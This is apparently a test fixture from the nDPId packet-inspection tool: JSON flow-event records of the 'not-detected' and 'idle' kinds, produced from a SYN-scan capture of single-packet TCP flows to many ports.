+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 